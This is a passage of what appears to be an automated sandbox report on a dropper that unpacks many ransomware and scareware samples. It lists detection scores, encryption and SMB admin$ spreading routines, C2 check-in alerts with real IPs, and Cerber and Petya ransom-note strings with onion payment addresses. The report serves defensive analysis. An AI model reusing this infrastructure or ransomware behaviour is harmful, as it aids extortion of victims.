        Source: C:\Users\user\AppData\Local\Temp\sh0cbz1h.c1l\Endermanch@BadRabbit.exeMetadefender: Detection: 82%Perma Link
        Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exeReversingLabs: Detection: 87%
        Source: C:\Users\user\AppData\Local\Temp\suoe0puk.byb\Fantom.exeMetadefender: Detection: 65%Perma Link
        Source: C:\Users\user\AppData\Local\Temp\u1k33a3l.310\Endermanch@HappyAntivirus.exeReversingLabs: Detection: 36%
        Source: C:\Users\user\AppData\Local\Temp\u1k33a3l.310\Endermanch@HappyAntivirus.exeMetadefender: Detection: 36%Perma Link
        Source: C:\Users\user\AppData\Local\Temp\vreukf5s.guu\Endermanch@Petya.A.exeReversingLabs: Detection: 100%
        Source: C:\Users\user\AppData\Local\Temp\vreukf5s.guu\Endermanch@Petya.A.exeMetadefender: Detection: 84%Perma Link
        Source: C:\Users\user\AppData\Local\Temp\y5f2j2j3.yr4\Endermanch@AntivirusPro2017.exeReversingLabs: Detection: 92%
        Source: C:\Users\user\AppData\Local\Temp\y5f2j2j3.yr4\Endermanch@AntivirusPro2017.exeMetadefender: Detection: 64%Perma Link
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeReversingLabs: Detection: 92%
        Source: C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exeMetadefender: Detection: 68%Perma Link
        Source: C:\Users\user\AppData\Roaming\Windows\Error file remover 1.0.0.0\install\0A01606\fatalerror.exeReversingLabs: Detection: 50%
        Source: C:\Windows\dispci.exeReversingLabs: Detection: 96%
        Source: C:\Windows\dispci.exeMetadefender: Detection: 85%Perma Link
        Source: 4W5dQXszUV.exeJoe Sandbox ML: detected
        Source: C:\Users\user\AppData\Local\Temp\bxkda0t5.zem\Endermanch@Krotten.exeJoe Sandbox ML: detected
        Source: C:\Users\user\AppData\Local\Temp\cyxviftp.gxb\Endermanch@InfinityCrypt.exeJoe Sandbox ML: detected
        Source: C:\Users\user\AppData\Local\Temp\3d3t2wty.l1d\Endermanch@NoMoreRansom.exeJoe Sandbox ML: detected
        Source: C:\ProgramData\Windows\csrss.exeJoe Sandbox ML: detected
        Source: C:\Users\user\AppData\Local\Temp\etnjaaha.pdu\Endermanch@Xyeta.exeJoe Sandbox ML: detected
        Source: C:\ProgramData\sWAsokQQ\wKAwMsck.exeJoe Sandbox ML: detected
        Source: C:\Users\user\AppData\Local\Temp\csz4moeg.pyf\Endermanch@WannaCrypt0r.exeJoe Sandbox ML: detected
        Source: 3.0.Endermanch@Birele.exe.400000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
        Source: 55.0.wKAwMsck.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
        Source: 13.0.Fantom.exe.400000.1.unpackAvira: Label: TR/AD.HiddenTear.huakh
        Source: 13.0.Fantom.exe.400000.0.unpackAvira: Label: TR/AD.HiddenTear.huakh
        Source: 1.2.Endermanch@BadRabbit.exe.880000.1.unpackAvira: Label: TR/ATRAPS.Gen
        Source: 1.0.Endermanch@BadRabbit.exe.880000.2.unpackAvira: Label: TR/ATRAPS.Gen
        Source: 1.0.Endermanch@BadRabbit.exe.880000.0.unpackAvira: Label: TR/ATRAPS.Gen
        Source: 44.0.Endermanch@Petya.A.exe.400000.3.unpackAvira: Label: TR/Crypt.XPACK.jvzj
        Source: 44.0.Endermanch@Petya.A.exe.400000.2.unpackAvira: Label: TR/Crypt.XPACK.jvzj
        Source: 3.0.Endermanch@Birele.exe.400000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
        Source: 5.2.Endermanch@Cerber5.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen7
        Source: 13.0.Fantom.exe.400000.3.unpackAvira: Label: TR/AD.HiddenTear.huakh
        Source: 3.0.Endermanch@Birele.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
        Source: 13.0.Fantom.exe.400000.2.unpackAvira: Label: TR/AD.HiddenTear.huakh
        Source: 5.2.Endermanch@Cerber5.exe.5e70000.2.unpackAvira: Label: TR/Crypt.XPACK.Gen7
        Source: 1.0.Endermanch@BadRabbit.exe.880000.3.unpackAvira: Label: TR/ATRAPS.Gen
        Source: 3.0.Endermanch@Birele.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
        Source: 44.0.Endermanch@Petya.A.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.jvzj
        Source: 1.0.Endermanch@BadRabbit.exe.880000.1.unpackAvira: Label: TR/ATRAPS.Gen
        Source: 44.0.Endermanch@Petya.A.exe.400000.1.unpackAvira: Label: TR/Crypt.XPACK.jvzj
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04A46085 CryptCreateHash,CryptHashData,CryptDeriveKey,CryptDestroyHash,4_2_04A46085
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04A46299 CreateEventW,CreateThread,WaitForSingleObject,CloseHandle,CryptDestroyHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,CloseHandle,LocalFree,4_2_04A46299
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04A45613 CryptStringToBinaryW,CryptStringToBinaryW,LocalAlloc,LocalAlloc,CryptStringToBinaryW,CryptDecodeObjectEx,CryptDecodeObjectEx,LocalAlloc,CryptDecodeObjectEx,CryptImportPublicKeyInfo,LocalFree,LocalFree,4_2_04A45613
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04A45A73 GetSystemInfo,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,MapViewOfFile,CryptDuplicateHash,CryptHashData,LocalAlloc,CryptGetHashParam,LocalFree,CryptDestroyHash,UnmapViewOfFile,4_2_04A45A73
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04A415A7 GetProcessHeap,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,HeapAlloc,CryptAcquireContextW,GetProcessHeap,HeapAlloc,CryptImportKey,CryptCreateHash,CryptSetHashParam,GetProcessHeap,HeapFree,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,4_2_04A415A7
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04A45BC4 GetSystemInfo,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,MapViewOfFile,CryptDuplicateHash,CryptHashData,LocalAlloc,CryptGetHashParam,memcpy,FlushViewOfFile,LocalFree,CryptDestroyHash,UnmapViewOfFile,4_2_04A45BC4
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04A45507 CryptAcquireContextW,CryptAcquireContextW,GetLastError,CryptAcquireContextW,4_2_04A45507
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04A45D0A CryptDuplicateKey,CreateFileW,GetFileSizeEx,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,CreateFileMappingW,MapViewOfFile,CryptEncrypt,FlushViewOfFile,UnmapViewOfFile,FindCloseChangeNotification,CloseHandle,CryptDestroyKey,SetEvent,4_2_04A45D0A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04A4554A CryptAcquireContextW,GetLastError,CryptGenRandom,CryptReleaseContext,4_2_04A4554A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04A456D8 CryptEncrypt,CryptEncrypt,LocalAlloc,memcpy,CryptEncrypt,LocalFree,4_2_04A456D8
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04A46246 CryptCreateHash,CryptHashData,CryptGetHashParam,4_2_04A46246
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04A45780 CryptBinaryToStringW,CryptBinaryToStringW,LocalAlloc,CryptBinaryToStringW,LocalFree,4_2_04A45780
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04A4559B CryptSetKeyParam,CryptSetKeyParam,CryptSetKeyParam,CryptGetKeyParam,LocalAlloc,CryptSetKeyParam,LocalFree,4_2_04A4559B

        Exploits

        barindex
        Source: global trafficTCP traffic: 192.168.2.0:139Jump to behavior
        Source: global trafficTCP traffic: 192.168.2.2:139Jump to behavior
        Source: global trafficTCP traffic: 192.168.2.1:445Jump to behavior
        Source: global trafficTCP traffic: 192.168.2.0:139Jump to behavior
        Source: global trafficTCP traffic: 192.168.2.2:139Jump to behavior
        Source: global trafficTCP traffic: 192.168.2.1:445Jump to behavior

        Compliance

        barindex
        Source: C:\Users\user\AppData\Local\Temp\pqu4wsie.qsh\Endermanch@Cerber5.exeUnpacked PE file: 5.2.Endermanch@Cerber5.exe.400000.0.unpack
        Source: 4W5dQXszUV.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
        Source: unknownHTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.4:49707 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.4:49708 version: TLS 1.2
        Source: 4W5dQXszUV.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: msi.pdb source: shi2B2E.tmp.53.dr
        Source: Binary string: criticalupdate01.pdb source: Fantom.exe, 0000000D.00000003.345964269.000000000077E000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: F:\Windows.old\Users\ArizonaCode\Documents\Visual Studio 2013\Projects\UI\UI\obj\Debug\UI.pdb source: Endermanch@InfinityCrypt.exe, 0000001A.00000000.346284169.0000000000723000.00000002.00000001.01000000.00000010.sdmp, Endermanch@InfinityCrypt.exe.0.dr
        Source: Binary string: F:\DESKTOP!\ChkDsk\ChkDsk\obj\Debug\PremiereCrack.pdb source: Endermanch@InfinityCrypt.exe, 0000001A.00000000.346769311.0000000000742000.00000002.00000001.01000000.00000010.sdmp, Endermanch@InfinityCrypt.exe.0.dr
        Source: Binary string: C:\Users\victor\Desktop\BRANCH\win\Release\custact\x86\AICustAct.pdb source: Error file remover.msi.53.dr
        Source: Binary string: C:\Users\victor\Desktop\BRANCH\win\Release\custact\x86\aischeduler.pdb source: Error file remover.msi.53.dr
        Source: Binary string: _.pdb source: Fantom.exe, 0000000D.00000003.345964269.000000000077E000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\victor\Desktop\BRANCH\win\Release\stubs\x86\ExternalUi.pdb source: Endermanch@WinlockerVB6Blacksod.exe, 00000035.00000000.408083341.000000000136E000.00000002.00000001.01000000.00000017.sdmp
        Source: Binary string: GoogleCrashHandler_unsigned.pdb} source: Endermanch@Petya.A.exe, 0000002C.00000002.565359831.0000000000428000.00000002.00000001.01000000.00000015.sdmp, Endermanch@Petya.A.exe, 0000002C.00000000.370245483.0000000000428000.00000002.00000001.01000000.00000015.sdmp
        Source: Binary string: msi.pdbUGP source: shi2B2E.tmp.53.dr
        Source: Binary string: GoogleCrashHandler_unsigned.pdb source: Endermanch@Petya.A.exe, 0000002C.00000002.565359831.0000000000428000.00000002.00000001.01000000.00000015.sdmp, Endermanch@Petya.A.exe, 0000002C.00000000.370245483.0000000000428000.00000002.00000001.01000000.00000015.sdmp
        Source: Binary string: C:\Users\victor\Desktop\BRANCH\win\Release\custact\x86\aischeduler2.pdb source: Error file remover.msi.53.dr
        Source: Binary string: C:\Windows.old\Users\ArizonaCode\Documents\Visual Studio 2013\Projects\LOGON\LOGON\obj\Debug\LOGON.pdb source: Endermanch@DeriaLock.exe, 0000000B.00000000.335502869.0000000000512000.00000002.00000001.01000000.0000000C.sdmp
        Source: Binary string: dcrypt.pdb source: rundll32.exe, 00000004.00000003.347913498.0000000003363000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.329448544.000000000334C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.363121457.000000000335A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.342307244.0000000003363000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.330844092.0000000003363000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\victor\Desktop\BRANCH\win\Release\stubs\x86\ExternalUi.pdbL source: Endermanch@WinlockerVB6Blacksod.exe, 00000035.00000000.408083341.000000000136E000.00000002.00000001.01000000.00000017.sdmp
        Source: Binary string: C:\Users\victor\Desktop\BRANCH\win\Release\custact\x86\AICustAct.pdb,0 source: Error file remover.msi.53.dr

        Spreading

        barindex
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04A49534 wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFindExtensionW,wsprintfW,GetLastError,WNetAddConnection2W,PathFileExistsW,GetLastError,GetLastError,WNetCancelConnection2W,OpenSCManagerW,memset,GetSystemTimeAsFileTime,wsprintfW,CreateServiceW,StartServiceW,GetLastError,QueryServiceStatus,Sleep,DeleteService,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,DeleteFileW,WNetCancelConnection2W,SetLastError, \\%s\admin$4_2_04A49534
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04A49B63 wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFindExtensionW,wsprintfW,WNetAddConnection2W,PathFileExistsW,GetLastError,GetLastError,WNetCancelConnection2W,GetCurrentThread,OpenThreadToken,DuplicateTokenEx,memset,GetSystemDirectoryW,CloseHandle,PathAppendW,PathFileExistsW,wsprintfW,CreateProcessAsUserW,CreateProcessW,WaitForSingleObject,GetExitCodeProcess,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,PathFileExistsW,GetLastError,GetLastError,DeleteFileW,CloseHandle,CloseHandle,WNetCancelConnection2W,SetLastError, \\%s\admin$4_2_04A49B63
        Source: C:\Users\user\AppData\Local\Temp\pqu4wsie.qsh\Endermanch@Cerber5.exeFile opened: z:Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\pqu4wsie.qsh\Endermanch@Cerber5.exeFile opened: x:Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\pqu4wsie.qsh\Endermanch@Cerber5.exeFile opened: v:Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\pqu4wsie.qsh\Endermanch@Cerber5.exeFile opened: t:Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\pqu4wsie.qsh\Endermanch@Cerber5.exeFile opened: r:Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\pqu4wsie.qsh\Endermanch@Cerber5.exeFile opened: p:Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\pqu4wsie.qsh\Endermanch@Cerber5.exeFile opened: n:Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\pqu4wsie.qsh\Endermanch@Cerber5.exeFile opened: l:Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\pqu4wsie.qsh\Endermanch@Cerber5.exeFile opened: j:Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\pqu4wsie.qsh\Endermanch@Cerber5.exeFile opened: h:Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\pqu4wsie.qsh\Endermanch@Cerber5.exeFile opened: f:Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\pqu4wsie.qsh\Endermanch@Cerber5.exeFile opened: b:Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\pqu4wsie.qsh\Endermanch@Cerber5.exeFile opened: y:Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\pqu4wsie.qsh\Endermanch@Cerber5.exeFile opened: w:Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\pqu4wsie.qsh\Endermanch@Cerber5.exeFile opened: u:Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\pqu4wsie.qsh\Endermanch@Cerber5.exeFile opened: s:Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\pqu4wsie.qsh\Endermanch@Cerber5.exeFile opened: q:Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\pqu4wsie.qsh\Endermanch@Cerber5.exeFile opened: o:Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\pqu4wsie.qsh\Endermanch@Cerber5.exeFile opened: m:Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\pqu4wsie.qsh\Endermanch@Cerber5.exeFile opened: k:Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\pqu4wsie.qsh\Endermanch@Cerber5.exeFile opened: i:Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\pqu4wsie.qsh\Endermanch@Cerber5.exeFile opened: g:Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\pqu4wsie.qsh\Endermanch@Cerber5.exeFile opened: e:Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\vreukf5s.guu\Endermanch@Petya.A.exeFile opened: c:
        Source: C:\Users\user\AppData\Local\Temp\pqu4wsie.qsh\Endermanch@Cerber5.exeFile opened: a:Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\nsefiyae.an3\Endermanch@Birele.exeCode function: 3_2_004048F8 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,3_2_004048F8
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04A45E9F PathCombineW,FindFirstFileW,WaitForMultipleObjects,PathCombineW,StrStrIW,PathFindExtensionW,FindNextFileW,FindClose,4_2_04A45E9F

        Networking

        barindex
        Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.168.2.0 139Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.168.2.2 139Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.168.2.1 445Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 131.253.33.200 445Jump to behavior
        Source: TrafficSnort IDS: 2023612 ET TROJAN Ransomware/Cerber Checkin M3 (1) 192.168.2.4:58566 -> 93.107.12.0:6893
        Source: TrafficSnort IDS: 2849814 ETPRO MALWARE TakeMyFile User-Agent 192.168.2.4:49779 -> 54.242.4.101:80
        Source: TrafficSnort IDS: 2849813 ETPRO MALWARE TakeMyFile Installer Checkin 192.168.2.4:49779 -> 54.242.4.101:80
        Source: TrafficSnort IDS: 2809804 ETPRO MALWARE FakeAdwareCleaner.A Checkin 192.168.2.4:49790 -> 185.53.177.53:80
        Source: TrafficSnort IDS: 2824087 ETPRO TROJAN MSIL/DeriaLock Ransomware CnC Activity 192.168.2.4:49795 -> 162.55.0.137:80
        Source: Endermanch@Cerber5.exe, 00000005.00000003.361349732.0000000006455000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <li>type or copy the add<span class="h">{RAND}</span>ress <br><span class="info">http://{TOR}.onion/{PC_ID}</span><br> in this browser address bar;</li>
        Source: Endermanch@Cerber5.exe, 00000005.00000003.361349732.0000000006455000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <br><span class="info">http://{TOR}.onion/{PC_ID}</span><br>
        Source: Endermanch@Cerber5.exe, 00000005.00000003.361349732.0000000006455000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <br><span class="info">http://{TOR}.onion/{PC_ID}</span><br></li>
        Source: Endermanch@Cerber5.exe, 00000005.00000003.361349732.0000000006455000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <li>typ of kopieer het a<span class="h">{RAND}</span>dres <br><span class="info">http://{TOR}.onion/{PC_ID}</span><br> in de adresbalk van uw browser;</li>
        Source: Endermanch@Cerber5.exe, 00000005.00000003.361349732.0000000006455000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: adresse <br><span class="info">http://{TOR}.onion/{PC_ID}</span><br> dans cette barre d
        Source: Endermanch@Cerber5.exe, 00000005.00000003.361349732.0000000006455000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <li>tippen oder kopieren Sie die Adresse <br><span class="info">http://{TOR}.onion/{PC_ID}</span><br> in diese Browser-Adressleiste;</li>
        Source: Endermanch@Cerber5.exe, 00000005.00000003.361349732.0000000006455000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <li>digitare o copiare l'indirizzo <br><span class="info">http://{TOR}.onion/{PC_ID}</span><br> nella barra degli indirizzi di questo browser;</li>
        Source: Endermanch@Cerber5.exe, 00000005.00000003.361349732.0000000006455000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <li>wpisz lub skopiuj adres <br><span class="info">http://{TOR}.onion/{PC_ID}</span><br> do paska adresu przegl
        Source: Endermanch@Cerber5.exe, 00000005.00000003.361349732.0000000006455000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: o <br><span class="info">http://{TOR}.onion/{PC_ID}</span><br> nesta barra de endere
        Source: Endermanch@Cerber5.exe, 00000005.00000003.361349732.0000000006455000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: n <br><span class="info">http://{TOR}.onion/{PC_ID}</span><br> en la barra de direcciones de este navegador;</li>
        Source: Endermanch@Cerber5.exe, 00000005.00000003.361349732.0000000006455000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: n adres <br><span class="info">http://{TOR}.onion/{PC_ID}</span><br>
        Source: Endermanch@Cerber5.exe, 00000005.00000003.361349732.0000000006455000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <li>type or copy the add<span class="h">Sh</span>ress <br><span class="info">http://xpcx6erilkjced3j.onion/0F6B-7D97-56E6-0098-B361</span><br> in this browser address bar;</li>
        Source: Endermanch@Cerber5.exe, 00000005.00000003.361349732.0000000006455000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <br><span class="info">http://xpcx6erilkjced3j.onion/0F6B-7D97-56E6-0098-B361</span><br>
        Source: Endermanch@Cerber5.exe, 00000005.00000003.361349732.0000000006455000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <br><span class="info">http://xpcx6erilkjced3j.onion/0F6B-7D97-56E6-0098-B361</span><br></li>
        Source: Endermanch@Cerber5.exe, 00000005.00000003.361349732.0000000006455000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <li>typ of kopieer het a<span class="h">7w</span>dres <br><span class="info">http://xpcx6erilkjced3j.onion/0F6B-7D97-56E6-0098-B361</span><br> in de adresbalk van uw browser;</li>
        Source: Endermanch@Cerber5.exe, 00000005.00000003.361349732.0000000006455000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: adresse <br><span class="info">http://xpcx6erilkjced3j.onion/0F6B-7D97-56E6-0098-B361</span><br> dans cette barre d
        Source: Endermanch@Cerber5.exe, 00000005.00000003.361349732.0000000006455000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <li>tippen oder kopieren Sie die Adresse <br><span class="info">http://xpcx6erilkjced3j.onion/0F6B-7D97-56E6-0098-B361</span><br> in diese Browser-Adressleiste;</li>
        Source: Endermanch@Cerber5.exe, 00000005.00000003.361349732.0000000006455000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <li>digitare o copiare l'indirizzo <br><span class="info">http://xpcx6erilkjced3j.onion/0F6B-7D97-56E6-0098-B361</span><br> nella barra degli indirizzi di questo browser;</li>
        Source: Endermanch@Cerber5.exe, 00000005.00000003.361349732.0000000006455000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <li>wpisz lub skopiuj adres <br><span class="info">http://xpcx6erilkjced3j.onion/0F6B-7D97-56E6-0098-B361</span><br> do paska adresu przegl
        Source: Endermanch@Cerber5.exe, 00000005.00000003.361349732.0000000006455000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: o <br><span class="info">http://xpcx6erilkjced3j.onion/0F6B-7D97-56E6-0098-B361</span><br> nesta barra de endere
        Source: Endermanch@Cerber5.exe, 00000005.00000003.361349732.0000000006455000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: n <br><span class="info">http://xpcx6erilkjced3j.onion/0F6B-7D97-56E6-0098-B361</span><br> en la barra de direcciones de este navegador;</li>
        Source: Endermanch@Cerber5.exe, 00000005.00000003.361349732.0000000006455000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: n adres <br><span class="info">http://xpcx6erilkjced3j.onion/0F6B-7D97-56E6-0098-B361</span><br>
        Source: Endermanch@Cerber5.exe, 00000005.00000002.392366706.0000000006438000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://xpcx6erilkjced3j.onion/0F6B-7D97-56E6-0098-B361
        Source: Endermanch@Cerber5.exe, 00000005.00000002.393125569.0000000006466000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <li>type or copy the add<span class="h">Sh</span>ress <br><span class="info">http://xpcx6erilkjced3j.onion/0F6B-7D97-56E6-0098-B361</span><br> in this browser address bar;</li>
        Source: Endermanch@Cerber5.exe, 00000005.00000002.393125569.0000000006466000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <br><span class="info">http://xpcx6erilkjced3j.onion/0F6B-7D97-56E6-0098-B361</span><br>
        Source: Endermanch@Cerber5.exe, 00000005.00000002.393125569.0000000006466000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <br><span class="info">http://xpcx6erilkjced3j.onion/0F6B-7D97-56E6-0098-B361</span><br></li>
        Source: Endermanch@Cerber5.exe, 00000005.00000002.393125569.0000000006466000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <li>typ of kopieer het a<span class="h">7w</span>dres <br><span class="info">http://xpcx6erilkjced3j.onion/0F6B-7D97-56E6-0098-B361</span><br> in de adresbalk van uw browser;</li>
        Source: Endermanch@Cerber5.exe, 00000005.00000002.393125569.0000000006466000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: adresse <br><span class="info">http://xpcx6erilkjced3j.onion/0F6B-7D97-56E6-0098-B361</span><br> dans cette barre d
        Source: Endermanch@Cerber5.exe, 00000005.00000002.393125569.0000000006466000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <li>tippen oder kopieren Sie die Adresse <br><span class="info">http://xpcx6erilkjced3j.onion/0F6B-7D97-56E6-0098-B361</span><br> in diese Browser-Adressleiste;</li>
        Source: Endermanch@Cerber5.exe, 00000005.00000002.393125569.0000000006466000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <li>digitare o copiare l'indirizzo <br><span class="info">http://xpcx6erilkjced3j.onion/0F6B-7D97-56E6-0098-B361</span><br> nella barra degli indirizzi di questo browser;</li>
        Source: Endermanch@Cerber5.exe, 00000005.00000002.393125569.0000000006466000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <li>wpisz lub skopiuj adres <br><span class="info">http://xpcx6erilkjced3j.onion/0F6B-7D97-56E6-0098-B361</span><br> do paska adresu przegl
        Source: Endermanch@Cerber5.exe, 00000005.00000002.393125569.0000000006466000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: o <br><span class="info">http://xpcx6erilkjced3j.onion/0F6B-7D97-56E6-0098-B361</span><br> nesta barra de endere
        Source: Endermanch@Cerber5.exe, 00000005.00000002.393125569.0000000006466000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: n <br><span class="info">http://xpcx6erilkjced3j.onion/0F6B-7D97-56E6-0098-B361</span><br> en la barra de direcciones de este navegador;</li>
        Source: Endermanch@Cerber5.exe, 00000005.00000002.393125569.0000000006466000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: n adres <br><span class="info">http://xpcx6erilkjced3j.onion/0F6B-7D97-56E6-0098-B361</span><br>
        Source: Endermanch@Cerber5.exe, 00000005.00000002.392694439.0000000006448000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://{TOR}.onion/{PC_ID}
        Source: Endermanch@Cerber5.exe, 00000005.00000003.336294517.0000000006432000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://{TOR}.onion/{PC_ID}
        Source: Endermanch@Cerber5.exe, 00000005.00000003.362009914.000000000644A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: how to decrypt your files. \n\n If you cannot find any (*_R_E_A_D___T_H_I_S_*) file at your PC, \n follow the instructions below: \n\n 1. Download \"Tor Browser\" from https://www.torproject.org/ and install it. \n 2. In the \"Tor Browser\" open your personal page here: \n\n http://{TOR}.onion/{PC_ID} \n\n Note! This page is available via \"Tor Browser\" only. \n\n\n"},"whitelist":{"folders":["\\bitcoin\\","\\excel\\","\\microsoft sql server\\","\\microsoft\\excel\\","\\microsoft\\microsoft sql server\\","\\microsoft\\office\\","\\microsoft\\onenote\\","\\microsoft\\outlook\\","\\microsoft\\powerpoint\\","\\microsoft\\word\\","\\office\\","\\onenote\\","\\outlook\\","\\powerpoint\\","\\steam\\","\\the bat!\\","\\thunderbird\\","\\word\\"]}}
        Source: Endermanch@Cerber5.exe, 00000005.00000003.362009914.000000000644A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://{TOR}.onion/{PC_ID}
        Source: Endermanch@Petya.A.exe, 0000002C.00000002.532115532.000000000019C000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://petya37h5tbhyvki.onion/SVjaQ4
        Source: Endermanch@Petya.A.exe, 0000002C.00000002.532115532.000000000019C000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://petya5koahtsf7sv.onion/SVjaQ4
